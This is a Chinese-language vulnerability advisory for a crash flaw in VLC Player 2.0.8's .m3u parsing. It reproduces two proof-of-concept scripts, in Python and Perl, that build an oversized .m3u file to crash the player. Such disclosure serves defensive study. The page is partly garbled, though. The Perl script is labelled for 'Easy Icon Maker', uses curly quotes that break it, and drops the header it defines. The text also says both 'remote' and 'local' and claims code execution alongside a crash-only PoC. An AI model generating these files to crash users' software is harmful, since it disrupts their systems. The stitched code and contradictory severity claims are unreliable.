漏洞起因
设计错误
危险等级
低
影响系统
VLC Player 2.0.8
不受影响系统
危害
远程攻击者可以利用漏洞可使应用程序崩溃。
CVSSv2:
攻击所需条件
攻击者必须构建恶意文件,诱使用户解析。
漏洞信息
VLC Player是一款流行的媒体播放程序。
VLC Player处理’.m3u’文件时存在一个安全漏洞,允许攻击者利用漏洞构建恶意文件,诱使用户解析,可使应用程序崩溃。
测试方法
# Exploit Title: VLC Player 2.0.8 <= Local Crash PoC
# Vendor URI: http://www.videolan.org/vlc/
# Vendor Description:
# VLC is a free and open source cross-platform multimedia player
# and framework that plays most multimedia files as well as DVD,
# Audio CD, VCD, and various streaming protocols.
# Tested on: [ Windows 7]
VLC Player is prone to a remote denial-of-service vulnerability.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition.
VLC Player 2.0.8 is vulnerable; other versions may also be affected.
# !/usr/bin/python
header="http://"
poc= "\x41" * 50000
file = open("asesino04.m3u","w")
file.write(header+poc)
file.close()
-------------------
#!/usr/bin/perl
system("title The Black Devils");
system("color 1e");
system("cls");
print "\n\n";
print " |=======================================================|\n";
print " |= [!] Name : Easy Icon Maker Version =|\n";
print " |= [!] Exploit : Crash Exploit =|\n";
print " |= [!] Author : The Black Devils =|\n";
print " |= [!] Mail: mr.k4rizma(at)gmail(dot)com =|\n";
print " |=======================================================|\n";
sleep(2);
print "\n";
# Creating ...
my $header="http://" ;
my $PoC = "\x41" x 50000 ;
open(file , ">“, “inj3ct0rs.m3u”);
print file $PoC;
print “\n [+] File successfully created!\n” or die print “\n [-] OupsS!
File is Not Created !! “;
close(file);
# Contact :
——————
# Fane Page : www.facebook.com/Th3.Black.D3Vils
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com
安全建议
厂商解决方案
目前没有详细解决方案提供:
http://www.videolan.org/vlc/
漏洞提供者
Asesino04
评论关闭。